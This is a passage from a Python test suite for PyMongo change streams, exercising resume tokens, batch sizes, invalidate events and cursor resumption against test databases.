raise NotImplementedError
def kill_change_stream_cursor(self, change_stream):
"""Cause a cursor not found error on the next getMore."""
cursor = change_stream._cursor
address = _CursorAddress(cursor.address, cursor._CommandCursor__ns)
client = self.watched_collection().database.client
client._close_cursor_now(cursor.cursor_id, address)
class APITestsMixin(object):
def test_watch(self):
with self.change_stream(
[{'$project': {'foo': 0}}], full_document='updateLookup',
max_await_time_ms=1000, batch_size=100) as change_stream:
self.assertEqual([{'$project': {'foo': 0}}],
change_stream._pipeline)
self.assertEqual('updateLookup', change_stream._full_document)
self.assertEqual(1000, change_stream._max_await_time_ms)
self.assertEqual(100, change_stream._batch_size)
self.assertIsInstance(change_stream._cursor, CommandCursor)
self.assertEqual(
1000, change_stream._cursor._CommandCursor__max_await_time_ms)
self.watched_collection(
write_concern=WriteConcern("majority")).insert_one({})
_ = change_stream.next()
resume_token = change_stream.resume_token
with self.assertRaises(TypeError):
self.change_stream(pipeline={})
with self.assertRaises(TypeError):
self.change_stream(full_document={})
# No Error.
with self.change_stream(resume_after=resume_token):
pass
def test_try_next(self):
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
coll.insert_one({})
self.addCleanup(coll.drop)
with self.change_stream(max_await_time_ms=250) as stream:
self.assertIsNone(stream.try_next()) # No changes initially.
coll.insert_one({}) # Generate a change.
# On sharded clusters, even majority-committed changes only show
# up once an event that sorts after it shows up on the other
# shard. So, we wait on try_next to eventually return changes.
wait_until(lambda: stream.try_next() is not None,
"get change from try_next")
def test_try_next_runs_one_getmore(self):
listener = EventListener()
client = rs_or_single_client(event_listeners=[listener])
# Connect to the cluster.
client.admin.command('ping')
listener.results.clear()
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
# Create the watched collection before starting the change stream to
# skip any "create" events.
coll.insert_one({'_id': 1})
self.addCleanup(coll.drop)
with self.change_stream_with_client(
client, max_await_time_ms=250) as stream:
self.assertEqual(listener.started_command_names(), ["aggregate"])
listener.results.clear()
# Confirm that only a single getMore is run even when no documents
# are returned.
self.assertIsNone(stream.try_next())
self.assertEqual(listener.started_command_names(), ["getMore"])
listener.results.clear()
self.assertIsNone(stream.try_next())
self.assertEqual(listener.started_command_names(), ["getMore"])
listener.results.clear()
# Get at least one change before resuming.
coll.insert_one({'_id': 2})
wait_until(lambda: stream.try_next() is not None,
"get change from try_next")
listener.results.clear()
# Cause the next request to initiate the resume process.
self.kill_change_stream_cursor(stream)
listener.results.clear()
# The sequence should be:
# - getMore, fail
# - resume with aggregate command
# - no results, return immediately without another getMore
self.assertIsNone(stream.try_next())
self.assertEqual(
listener.started_command_names(), ["getMore", "aggregate"])
listener.results.clear()
# Stream still works after a resume.
coll.insert_one({'_id': 3})
wait_until(lambda: stream.try_next() is not None,
"get change from try_next")
self.assertEqual(set(listener.started_command_names()),
set(["getMore"]))
self.assertIsNone(stream.try_next())
def test_batch_size_is_honored(self):
listener = EventListener()
client = rs_or_single_client(event_listeners=[listener])
# Connect to the cluster.
client.admin.command('ping')
listener.results.clear()
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
# Create the watched collection before starting the change stream to
# skip any "create" events.
coll.insert_one({'_id': 1})
self.addCleanup(coll.drop)
# Expected batchSize.
expected = {'batchSize': 23}
with self.change_stream_with_client(
client, max_await_time_ms=250, batch_size=23) as stream:
# Confirm that batchSize is honored for initial batch.
cmd = listener.results['started'][0].command
self.assertEqual(cmd['cursor'], expected)
listener.results.clear()
# Confirm that batchSize is honored by getMores.
self.assertIsNone(stream.try_next())
cmd = listener.results['started'][0].command
key = next(iter(expected))
self.assertEqual(expected[key], cmd[key])
# $changeStream.startAtOperationTime was added in 4.0.0.
@client_context.require_version_min(4, 0, 0)
def test_start_at_operation_time(self):
optime = self.get_start_at_operation_time()
coll = self.watched_collection(
write_concern=WriteConcern("majority"))
ndocs = 3
coll.insert_many([{"data": i} for i in range(ndocs)])
with self.change_stream(start_at_operation_time=optime) as cs:
for i in range(ndocs):
cs.next()
def _test_full_pipeline(self, expected_cs_stage):
client, listener = self.client_with_listener("aggregate")
results = listener.results
with self.change_stream_with_client(
client, [{'$project': {'foo': 0}}]) as _:
pass
self.assertEqual(1, len(results['started']))
command = results['started'][0]
self.assertEqual('aggregate', command.command_name)
self.assertEqual([
{'$changeStream': expected_cs_stage},
{'$project': {'foo': 0}}],
command.command['pipeline'])
def test_full_pipeline(self):
"""$changeStream must be the first stage in a change stream pipeline
sent to the server.
"""
self._test_full_pipeline({})
def test_iteration(self):
with self.change_stream(batch_size=2) as change_stream:
num_inserted = 10
self.watched_collection().insert_many(
[{} for _ in range(num_inserted)])
inserts_received = 0
for change in change_stream:
self.assertEqual(change['operationType'], 'insert')
inserts_received += 1
if inserts_received == num_inserted:
break
self._test_invalidate_stops_iteration(change_stream)
def _test_next_blocks(self, change_stream):
inserted_doc = {'_id': ObjectId()}
changes = []
t = threading.Thread(
target=lambda: changes.append(change_stream.next()))
t.start()
# Sleep for a bit to prove that the call to next() blocks.
time.sleep(1)
self.assertTrue(t.is_alive())
self.assertFalse(changes)
self.watched_collection().insert_one(inserted_doc)
# Join with large timeout to give the server time to return the change,
# in particular for shard clusters.
t.join(30)
self.assertFalse(t.is_alive())
self.assertEqual(1, len(changes))
self.assertEqual(changes[0]['operationType'], 'insert')
self.assertEqual(changes[0]['fullDocument'], inserted_doc)
def test_next_blocks(self):
"""Test that next blocks until a change is readable"""
# Use a short await time to speed up the test.
with self.change_stream(max_await_time_ms=250) as change_stream:
self._test_next_blocks(change_stream)
def test_aggregate_cursor_blocks(self):
"""Test that an aggregate cursor blocks until a change is readable."""
with self.watched_collection().aggregate(
[{'$changeStream': {}}], maxAwaitTimeMS=250) as change_stream:
self._test_next_blocks(change_stream)
def test_concurrent_close(self):
"""Ensure a ChangeStream can be closed from another thread."""
# Use a short await time to speed up the test.
with self.change_stream(max_await_time_ms=250) as change_stream:
def iterate_cursor():
for _ in change_stream:
pass
t = threading.Thread(target=iterate_cursor)
t.start()
self.watched_collection().insert_one({})
time.sleep(1)
change_stream.close()
t.join(3)
self.assertFalse(t.is_alive())
def test_unknown_full_document(self):
"""Must rely on the server to raise an error on unknown fullDocument.
"""
try:
with self.change_stream(full_document='notValidatedByPyMongo'):
pass
except OperationFailure:
pass
def test_change_operations(self):
"""Test each operation type."""
expected_ns = {'db': self.watched_collection().database.name,
'coll': self.watched_collection().name}
with self.change_stream() as change_stream:
# Insert.
inserted_doc = {'_id': ObjectId(), 'foo': 'bar'}
self.watched_collection().insert_one(inserted_doc)
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], expected_ns)
self.assertEqual(change['fullDocument'], inserted_doc)
# Update.
update_spec = {'$set': {'new': 1}, '$unset': {'foo': 1}}
self.watched_collection().update_one(inserted_doc, update_spec)
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'update')
self.assertEqual(change['ns'], expected_ns)
self.assertNotIn('fullDocument', change)
expected_update_description = {
'updatedFields': {'new': 1},
'removedFields': ['foo']}
if client_context.version.at_least(4, 5, 0):
expected_update_description['truncatedArrays'] = []
self.assertEqual(expected_update_description,
change['updateDescription'])
# Replace.
self.watched_collection().replace_one({'new': 1}, {'foo': 'bar'})
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'replace')
self.assertEqual(change['ns'], expected_ns)
self.assertEqual(change['fullDocument'], inserted_doc)
# Delete.
self.watched_collection().delete_one({'foo': 'bar'})
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'delete')
self.assertEqual(change['ns'], expected_ns)
self.assertNotIn('fullDocument', change)
# Invalidate.
self._test_get_invalidate_event(change_stream)
@client_context.require_version_min(4, 1, 1)
def test_start_after(self):
resume_token = self.get_resume_token(invalidate=True)
# resume_after cannot resume after invalidate.
with self.assertRaises(OperationFailure):
self.change_stream(resume_after=resume_token)
# start_after can resume after invalidate.
with self.change_stream(start_after=resume_token) as change_stream:
self.watched_collection().insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
@client_context.require_version_min(4, 1, 1)
def test_start_after_resume_process_with_changes(self):
resume_token = self.get_resume_token(invalidate=True)
with self.change_stream(start_after=resume_token,
max_await_time_ms=250) as change_stream:
self.watched_collection().insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
self.assertIsNone(change_stream.try_next())
self.kill_change_stream_cursor(change_stream)
self.watched_collection().insert_one({'_id': 3})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 3})
@client_context.require_no_mongos # Remove after SERVER-41196
@client_context.require_version_min(4, 1, 1)
def test_start_after_resume_process_without_changes(self):
resume_token = self.get_resume_token(invalidate=True)
with self.change_stream(start_after=resume_token,
max_await_time_ms=250) as change_stream:
self.assertIsNone(change_stream.try_next())
self.kill_change_stream_cursor(change_stream)
self.watched_collection().insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
class ProseSpecTestsMixin(object):
def _client_with_listener(self, *commands):
listener = AllowListEventListener(*commands)
client = rs_or_single_client(event_listeners=[listener])
self.addCleanup(client.close)
return client, listener
def _populate_and_exhaust_change_stream(self, change_stream, batch_size=3):
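# Insert `batch_size` documents and iterate the stream until that batch is
# exhausted; returns the last change seen.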
self.watched_collection().insert_many(
[{"data": k} for k in range(batch_size)])
for _ in range(batch_size):
change = next(change_stream)
return change
def _get_expected_resume_token_legacy(self, stream,
listener, previous_change=None):
"""Predicts what the resume token should currently be for server
versions that don't support postBatchResumeToken. Assumes the stream
has never returned any changes if previous_change is None."""
if previous_change is None:
agg_cmd = listener.results['started'][0]
stage = agg_cmd.command["pipeline"][0]["$changeStream"]
return stage.get("resumeAfter") or stage.get("startAfter")
return previous_change['_id']
def _get_expected_resume_token(self, stream, listener,
previous_change=None):
"""Predicts what the resume token should currently be for server
versions that support postBatchResumeToken. Assumes the stream has
never returned any changes if previous_change is None. Assumes
listener is an AllowListEventListener that listens for aggregate and
getMore commands."""
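# Fall back to the legacy prediction while no change has been returned or the
# cursor still has buffered changes; otherwise (or if that yields nothing) the
# token is the postBatchResumeToken from the most recent command reply.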
if previous_change is None or stream._cursor._has_next():
token = self._get_expected_resume_token_legacy(
stream, listener, previous_change)
if token is not None:
return token
response = listener.results['succeeded'][-1].reply
return response['cursor']['postBatchResumeToken']
def _test_raises_error_on_missing_id(self, expected_exception):
"""ChangeStream will raise an exception if the server response is
missing the resume token.
"""
with self.change_stream([{'$project': {'_id': 0}}]) as change_stream:
self.watched_collection().insert_one({})
with self.assertRaises(expected_exception):
next(change_stream)
# The cursor should now be closed.
with self.assertRaises(StopIteration):
next(change_stream)
def _test_update_resume_token(self, expected_rt_getter):
"""ChangeStream must continuously track the last seen resumeToken."""
client, listener = self._client_with_listener("aggregate", "getMore")
coll = self.watched_collection(write_concern=WriteConcern('majority'))
with self.change_stream_with_client(client) as change_stream:
self.assertEqual(
change_stream.resume_token,
expected_rt_getter(change_stream, listener))
for _ in range(3):
coll.insert_one({})
change = next(change_stream)
self.assertEqual(
change_stream.resume_token,
expected_rt_getter(change_stream, listener, change))
# Prose test no. 1
@client_context.require_version_min(4, 0, 7)
def test_update_resume_token(self):
self._test_update_resume_token(self._get_expected_resume_token)
# Prose test no. 1
@client_context.require_version_max(4, 0, 7)
def test_update_resume_token_legacy(self):
self._test_update_resume_token(self._get_expected_resume_token_legacy)
# Prose test no. 2
@client_context.require_version_max(4, 3, 3) # PYTHON-2120
@client_context.require_version_min(4, 1, 8)
def test_raises_error_on_missing_id_418plus(self):
# Server returns an error on 4.1.8+
self._test_raises_error_on_missing_id(OperationFailure)
# Prose test no. 2
@client_context.require_version_max(4, 1, 8)
def test_raises_error_on_missing_id_418minus(self):
# PyMongo raises an error
self._test_raises_error_on_missing_id(InvalidOperation)
# Prose test no. 3
def test_resume_on_error(self):
with self.change_stream() as change_stream:
self.insert_one_and_check(change_stream, {'_id': 1})
# Cause a cursor not found error on the next getMore.
self.kill_change_stream_cursor(change_stream)
self.insert_one_and_check(change_stream, {'_id': 2})
# Prose test no. 4
@client_context.require_failCommand_fail_point
def test_no_resume_attempt_if_aggregate_command_fails(self):
# Set non-retryable error on aggregate command.
fail_point = {'mode': {'times': 1},
'data': {'errorCode': 2, 'failCommands': ['aggregate']}}
client, listener = self._client_with_listener("aggregate", "getMore")
with self.fail_point(fail_point):
try:
_ = self.change_stream_with_client(client)
except OperationFailure:
pass
# Driver should have attempted aggregate command only once.
self.assertEqual(len(listener.results['started']), 1)
self.assertEqual(listener.results['started'][0].command_name,
'aggregate')
# Prose test no. 5 - REMOVED
# Prose test no. 6 - SKIPPED
# Reason: readPreference is not configurable using the watch() helpers
# so we can skip this test. Also, PyMongo performs server selection for
# each operation, which ensures compliance with this prose test.
# Prose test no. 7
def test_initial_empty_batch(self):
with self.change_stream() as change_stream:
# The first batch should be empty.
self.assertFalse(change_stream._cursor._has_next())
cursor_id = change_stream._cursor.cursor_id
self.assertTrue(cursor_id)
self.insert_one_and_check(change_stream, {})
# Make sure we're still using the same cursor.
self.assertEqual(cursor_id, change_stream._cursor.cursor_id)
# Prose test no. 8
def test_kill_cursors(self):
def raise_error():
raise ServerSelectionTimeoutError('mock error')
with self.change_stream() as change_stream:
self.insert_one_and_check(change_stream, {'_id': 1})
# Cause a cursor not found error on the next getMore.
cursor = change_stream._cursor
self.kill_change_stream_cursor(change_stream)
cursor.close = raise_error
self.insert_one_and_check(change_stream, {'_id': 2})
# Prose test no. 9
@client_context.require_version_min(4, 0, 0)
@client_context.require_version_max(4, 0, 7)
def test_start_at_operation_time_caching(self):
# Case 1: change stream not started with startAtOperationTime
client, listener = self._client_with_listener("aggregate")
with self.change_stream_with_client(client) as cs:
self.kill_change_stream_cursor(cs)
cs.try_next()
cmd = listener.results['started'][-1].command
self.assertIsNotNone(cmd["pipeline"][0]["$changeStream"].get(
"startAtOperationTime"))
# Case 2: change stream started with startAtOperationTime
listener.results.clear()
optime = self.get_start_at_operation_time()
with self.change_stream_with_client(
client, start_at_operation_time=optime) as cs:
self.kill_change_stream_cursor(cs)
cs.try_next()
cmd = listener.results['started'][-1].command
self.assertEqual(cmd["pipeline"][0]["$changeStream"].get(
"startAtOperationTime"), optime, str([k.command for k in
listener.results['started']]))
# Prose test no. 10 - SKIPPED
# This test is identical to prose test no. 3.
# Prose test no. 11
@client_context.require_version_min(4, 0, 7)
def test_resumetoken_empty_batch(self):
client, listener = self._client_with_listener("getMore")
with self.change_stream_with_client(client) as change_stream:
self.assertIsNone(change_stream.try_next())
resume_token = change_stream.resume_token
response = listener.results['succeeded'][0].reply
self.assertEqual(resume_token,
response["cursor"]["postBatchResumeToken"])
# Prose test no. 11
@client_context.require_version_min(4, 0, 7)
def test_resumetoken_exhausted_batch(self):
client, listener = self._client_with_listener("getMore")
with self.change_stream_with_client(client) as change_stream:
self._populate_and_exhaust_change_stream(change_stream)
resume_token = change_stream.resume_token
response = listener.results['succeeded'][-1].reply
self.assertEqual(resume_token,
response["cursor"]["postBatchResumeToken"])
# Prose test no. 12
@client_context.require_version_max(4, 0, 7)
def test_resumetoken_empty_batch_legacy(self):
resume_point = self.get_resume_token()
# Empty resume token when neither resumeAfter or startAfter specified.
with self.change_stream() as change_stream:
change_stream.try_next()
self.assertIsNone(change_stream.resume_token)
# Resume token value is same as resumeAfter.
with self.change_stream(resume_after=resume_point) as change_stream:
change_stream.try_next()
resume_token = change_stream.resume_token
self.assertEqual(resume_token, resume_point)
# Prose test no. 12
@client_context.require_version_max(4, 0, 7)
def test_resumetoken_exhausted_batch_legacy(self):
# Resume token is _id of last change.
with self.change_stream() as change_stream:
change = self._populate_and_exhaust_change_stream(change_stream)
self.assertEqual(change_stream.resume_token, change["_id"])
resume_point = change['_id']
# Resume token is _id of last change even if resumeAfter is specified.
with self.change_stream(resume_after=resume_point) as change_stream:
change = self._populate_and_exhaust_change_stream(change_stream)
self.assertEqual(change_stream.resume_token, change["_id"])
# Prose test no. 13
def test_resumetoken_partially_iterated_batch(self):
# When the batch has been iterated up to but not including its last element,
# the resume token should be the _id of the most recently returned change.
with self.change_stream() as change_stream:
self.watched_collection(
write_concern=WriteConcern('majority')).insert_many(
[{"data": k} for k in range(3)])
for _ in range(2):
change = next(change_stream)
resume_token = change_stream.resume_token
self.assertEqual(resume_token, change["_id"])
def _test_resumetoken_uniterated_nonempty_batch(self, resume_option):
# When the batch is non-empty and hasn't been iterated at all, the resume
# token should be the same as the resume option used.
resume_point = self.get_resume_token()
# Insert some documents so that firstBatch isn't empty.
self.watched_collection(
write_concern=WriteConcern("majority")).insert_many(
[{'a': 1}, {'b': 2}, {'c': 3}])
# Resume token should be same as the resume option.
with self.change_stream(
**{resume_option: resume_point}) as change_stream:
self.assertTrue(change_stream._cursor._has_next())
resume_token = change_stream.resume_token
self.assertEqual(resume_token, resume_point)
# Prose test no. 14
@client_context.require_no_mongos
def test_resumetoken_uniterated_nonempty_batch_resumeafter(self):
self._test_resumetoken_uniterated_nonempty_batch("resume_after")
# Prose test no. 14
@client_context.require_no_mongos
@client_context.require_version_min(4, 1, 1)
def test_resumetoken_uniterated_nonempty_batch_startafter(self):
self._test_resumetoken_uniterated_nonempty_batch("start_after")
# Prose test no. 17
@client_context.require_version_min(4, 1, 1)
def test_startafter_resume_uses_startafter_after_empty_getMore(self):
# Resume should use startAfter after no changes have been returned.
resume_point = self.get_resume_token()
client, listener = self._client_with_listener("aggregate")
with self.change_stream_with_client(
client, start_after=resume_point) as change_stream:
self.assertFalse(change_stream._cursor._has_next()) # No changes
change_stream.try_next() # No changes
self.kill_change_stream_cursor(change_stream)
change_stream.try_next() # Resume attempt
response = listener.results['started'][-1]
self.assertIsNone(
response.command["pipeline"][0]["$changeStream"].get("resumeAfter"))
self.assertIsNotNone(
response.command["pipeline"][0]["$changeStream"].get("startAfter"))
# Prose test no. 18
@client_context.require_version_min(4, 1, 1)
def test_startafter_resume_uses_resumeafter_after_nonempty_getMore(self):
# Resume should use resumeAfter after some changes have been returned.
resume_point = self.get_resume_token()
client, listener = self._client_with_listener("aggregate")
with self.change_stream_with_client(
client, start_after=resume_point) as change_stream:
self.assertFalse(change_stream._cursor._has_next()) # No changes
self.watched_collection().insert_one({})
next(change_stream) # Changes
self.kill_change_stream_cursor(change_stream)
change_stream.try_next() # Resume attempt
response = listener.results['started'][-1]
self.assertIsNotNone(
response.command["pipeline"][0]["$changeStream"].get("resumeAfter"))
self.assertIsNone(
response.command["pipeline"][0]["$changeStream"].get("startAfter"))
class TestClusterChangeStream(TestChangeStreamBase, APITestsMixin):
@classmethod
@client_context.require_version_min(4, 0, 0, -1)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestClusterChangeStream, cls).setUpClass()
cls.dbs = [cls.db, cls.client.pymongo_test_2]
@classmethod
def tearDownClass(cls):
for db in cls.dbs:
cls.client.drop_database(db)
super(TestClusterChangeStream, cls).tearDownClass()
def change_stream_with_client(self, client, *args, **kwargs):
return client.watch(*args, **kwargs)
def generate_invalidate_event(self, change_stream):
self.skipTest("cluster-level change streams cannot be invalidated")
def _test_get_invalidate_event(self, change_stream):
# Cluster-level change streams don't get invalidated.
pass
def _test_invalidate_stops_iteration(self, change_stream):
# Cluster-level change streams don't get invalidated.
pass
def _insert_and_check(self, change_stream, db, collname, doc):
coll = db[collname]
coll.insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], {'db': db.name,
'coll': collname})
self.assertEqual(change['fullDocument'], doc)
def insert_one_and_check(self, change_stream, doc):
db = random.choice(self.dbs)
collname = self.id()
self._insert_and_check(change_stream, db, collname, doc)
def test_simple(self):
collnames = self.generate_unique_collnames(3)
with self.change_stream() as change_stream:
for db, collname in product(self.dbs, collnames):
self._insert_and_check(
change_stream, db, collname, {'_id': collname}
)
def test_aggregate_cursor_blocks(self):
"""Test that an aggregate cursor blocks until a change is readable."""
with self.client.admin.aggregate(
[{'$changeStream': {'allChangesForCluster': True}}],
maxAwaitTimeMS=250) as change_stream:
self._test_next_blocks(change_stream)
def test_full_pipeline(self):
"""$changeStream must be the first stage in a change stream pipeline
sent to the server.
"""
self._test_full_pipeline({'allChangesForCluster': True})
class TestDatabaseChangeStream(TestChangeStreamBase, APITestsMixin):
@classmethod
@client_context.require_version_min(4, 0, 0, -1)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestDatabaseChangeStream, cls).setUpClass()
def change_stream_with_client(self, client, *args, **kwargs):
return client[self.db.name].watch(*args, **kwargs)
def generate_invalidate_event(self, change_stream):
# Dropping the database invalidates the change stream.
change_stream._client.drop_database(self.db.name)
def _test_get_invalidate_event(self, change_stream):
# Cache collection names.
dropped_colls = self.db.list_collection_names()
# Drop the watched database to get an invalidate event.
self.generate_invalidate_event(change_stream)
change = change_stream.next()
# 4.1+ returns "drop" events for each collection in dropped database
# and a "dropDatabase" event for the database itself.
if change['operationType'] == 'drop':
self.assertTrue(change['_id'])
for _ in range(len(dropped_colls)):
ns = change['ns']
self.assertEqual(ns['db'], change_stream._target.name)
self.assertIn(ns['coll'], dropped_colls)
change = change_stream.next()
self.assertEqual(change['operationType'], 'dropDatabase')
self.assertTrue(change['_id'])
self.assertEqual(change['ns'], {'db': change_stream._target.name})
# Get next change.
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'invalidate')
self.assertNotIn('ns', change)
self.assertNotIn('fullDocument', change)
# The ChangeStream should be dead.
with self.assertRaises(StopIteration):
change_stream.next()
def _test_invalidate_stops_iteration(self, change_stream):
# Drop the watched database to get an invalidate event.
change_stream._client.drop_database(self.db.name)
# Check drop and dropDatabase events.
for change in change_stream:
self.assertIn(change['operationType'], (
'drop', 'dropDatabase', 'invalidate'))
# Last change must be invalidate.
self.assertEqual(change['operationType'], 'invalidate')
# Change stream must not allow further iteration.
with self.assertRaises(StopIteration):
change_stream.next()
with self.assertRaises(StopIteration):
next(change_stream)
def _insert_and_check(self, change_stream, collname, doc):
coll = self.db[collname]
coll.insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], {'db': self.db.name,
'coll': collname})
self.assertEqual(change['fullDocument'], doc)
def insert_one_and_check(self, change_stream, doc):
self._insert_and_check(change_stream, self.id(), doc)
def test_simple(self):
collnames = self.generate_unique_collnames(3)
with self.change_stream() as change_stream:
for collname in collnames:
self._insert_and_check(
change_stream, collname,
{'_id': Binary.from_uuid(uuid.uuid4())})
def test_isolation(self):
# Ensure inserts to other dbs don't show up in our ChangeStream.
other_db = self.client.pymongo_test_temp
self.assertNotEqual(
other_db, self.db, msg="Isolation must be tested on separate DBs")
collname = self.id()
with self.change_stream() as change_stream:
other_db[collname].insert_one(
{'_id': Binary.from_uuid(uuid.uuid4())})
self._insert_and_check(
change_stream, collname,
{'_id': Binary.from_uuid(uuid.uuid4())})
self.client.drop_database(other_db)
class TestCollectionChangeStream(TestChangeStreamBase, APITestsMixin,
ProseSpecTestsMixin):
@classmethod
@client_context.require_version_min(3, 5, 11)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestCollectionChangeStream, cls).setUpClass()
def setUp(self):
# Use a new collection for each test.
self.watched_collection().drop()
self.watched_collection().insert_one({})
def change_stream_with_client(self, client, *args, **kwargs):
return client[self.db.name].get_collection(
self.watched_collection().name).watch(*args, **kwargs)
def generate_invalidate_event(self, change_stream):
# Dropping the collection invalidates the change stream.
change_stream._target.drop()
def _test_invalidate_stops_iteration(self, change_stream):
self.generate_invalidate_event(change_stream)
# Check the drop and invalidate events.
for change in change_stream:
self.assertIn(change['operationType'], ('drop', 'invalidate'))
# Last change must be invalidate.
self.assertEqual(change['operationType'], 'invalidate')
# Change stream must not allow further iteration.
with self.assertRaises(StopIteration):
change_stream.next()
with self.assertRaises(StopIteration):
next(change_stream)
def _test_get_invalidate_event(self, change_stream):
# Drop the watched collection to get an invalidate event.
change_stream._target.drop()
change = change_stream.next()
# 4.1+ returns a "drop" change document.
if change['operationType'] == 'drop':
self.assertTrue(change['_id'])
self.assertEqual(change['ns'], {
'db': change_stream._target.database.name,
'coll': change_stream._target.name})
# Last change should be invalidate.
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'invalidate')
self.assertNotIn('ns', change)
self.assertNotIn('fullDocument', change)
# The ChangeStream should be dead.
with self.assertRaises(StopIteration):
change_stream.next()
def insert_one_and_check(self, change_stream, doc):
self.watched_collection().insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(
change['ns'], {'db': self.watched_collection().database.name,
'coll': self.watched_collection().name})
self.assertEqual(change['fullDocument'], doc)
def test_raw(self):
"""Test with RawBSONDocument."""
raw_coll = self.watched_collection(
codec_options=DEFAULT_RAW_BSON_OPTIONS)
with raw_coll.watch() as change_stream:
raw_doc = RawBSONDocument(encode({'_id': 1}))
self.watched_collection().insert_one(raw_doc)
change = next(change_stream)
self.assertIsInstance(change, RawBSONDocument)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(
change['ns']['db'], self.watched_collection().database.name)
self.assertEqual(
change['ns']['coll'], self.watched_collection().name)
self.assertEqual(change['fullDocument'], raw_doc)
def test_uuid_representations(self):
"""Test with uuid document _ids and different uuid_representation."""
for uuid_representation in ALL_UUID_REPRESENTATIONS:
for id_subtype in (STANDARD, PYTHON_LEGACY):
options = self.watched_collection().codec_options.with_options(
uuid_representation=uuid_representation)
coll = self.watched_collection(codec_options=options)
with coll.watch() as change_stream:
coll.insert_one(
{'_id': Binary(uuid.uuid4().bytes, id_subtype)})
_ = change_stream.next()
resume_token = change_stream.resume_token
# Should not error.
coll.watch(resume_after=resume_token)
def test_document_id_order(self):
"""Test with document _ids that need their order preserved."""
random_keys = random.sample(string.ascii_letters,
len(string.ascii_letters))
random_doc = {'_id': SON([(key, key) for key in random_keys])}
for document_class in (dict, SON, RawBSONDocument):
options = self.watched_collection().codec_options.with_options(
document_class=document_class)
coll = self.watched_collection(codec_options=options)
with coll.watch() as change_stream:
coll.insert_one(random_doc)
_ = change_stream.next()
resume_token = change_stream.resume_token
# The resume token is always a document.
self.assertIsInstance(resume_token, document_class)
# Should not error.
coll.watch(resume_after=resume_token)
coll.delete_many({})
def test_read_concern(self):
"""Test readConcern is not validated by the driver."""
# Read concern 'local' is not allowed for $changeStream.
coll = self.watched_collection(read_concern=ReadConcern('local'))
with self.assertRaises(OperationFailure):
coll.watch()
# Does not error.
coll = self.watched_collection(read_concern=ReadConcern('majority'))
with coll.watch():
pass
class TestAllLegacyScenarios(IntegrationTest):
RUN_ON_LOAD_BALANCER = True
@classmethod
@client_context.require_connection
def setUpClass(cls):
super(TestAllLegacyScenarios, cls).setUpClass()
cls.listener = AllowListEventListener("aggregate", "getMore")
cls.client = rs_or_single_client(event_listeners=[cls.listener])
@classmethod
def tearDownClass(cls):
cls.client.close()
super(TestAllLegacyScenarios, cls).tearDownClass()
def setUp(self):
super(TestAllLegacyScenarios, self).setUp()
self.listener.results.clear()
def setUpCluster(self, scenario_dict):
assets = [(scenario_dict["database_name"],
scenario_dict["collection_name"]),
(scenario_dict.get("database2_name", "db2"),
scenario_dict.get("collection2_name", "coll2"))]
for db, coll in assets:
self.client.drop_database(db)
self.client[db].create_collection(coll)
def setFailPoint(self, scenario_dict):
fail_point = scenario_dict.get("failPoint")
if fail_point is None:
return
elif not client_context.test_commands_enabled:
self.skipTest("Test commands must be enabled")
fail_cmd = SON([('configureFailPoint', 'failCommand')])
fail_cmd.update(fail_point)
client_context.client.admin.command(fail_cmd)
self.addCleanup(
client_context.client.admin.command,
'configureFailPoint', fail_cmd['configureFailPoint'], mode='off')
def assert_list_contents_are_subset(self, superlist, sublist):
"""Check that each element in sublist is a subset of the corresponding
element in superlist."""
self.assertEqual(len(superlist), len(sublist))
for sup, sub in zip(superlist, sublist):
if isinstance(sub, dict):
self.assert_dict_is_subset(sup, sub)
continue
if isinstance(sub, (list, tuple)):
self.assert_list_contents_are_subset(sup, sub)
continue
self.assertEqual(sup, sub)
def assert_dict_is_subset(self, superdict, subdict):
"""Check that subdict is a subset of superdict."""
exempt_fields = ["documentKey", "_id", "getMore"]
for key, value in subdict.items():
if key not in superdict:
self.fail('Key %s not found in %s' % (key, superdict))
if isinstance(value, dict):
self.assert_dict_is_subset(superdict[key], value)
continue
if isinstance(value, (list, tuple)):
self.assert_list_contents_are_subset(superdict[key], value)
continue
if key in exempt_fields:
# Only check that exempt fields are present; don't compare their values.
self.assertIn(key, superdict)
else:
self.assertEqual(superdict[key], value)
def check_event(self, event, expectation_dict):
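# `event` is a command monitoring event captured by the listener (or None if
# fewer events were seen than expected); dict-valued expectations are checked
# as subsets, everything else by equality.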
if event is None:
self.fail('Expected an event but none was captured.')
for key, value in expectation_dict.items():
if isinstance(value, dict):
self.assert_dict_is_subset(getattr(event, key), value)
else:
self.assertEqual(getattr(event, key), value)
def tearDown(self):
self.listener.results.clear()
_TEST_PATH = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'change_streams')
def camel_to_snake(camel):
# Regex to convert CamelCase to snake_case.
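# For example, 'maxAwaitTimeMS' becomes 'max_await_time_ms' and
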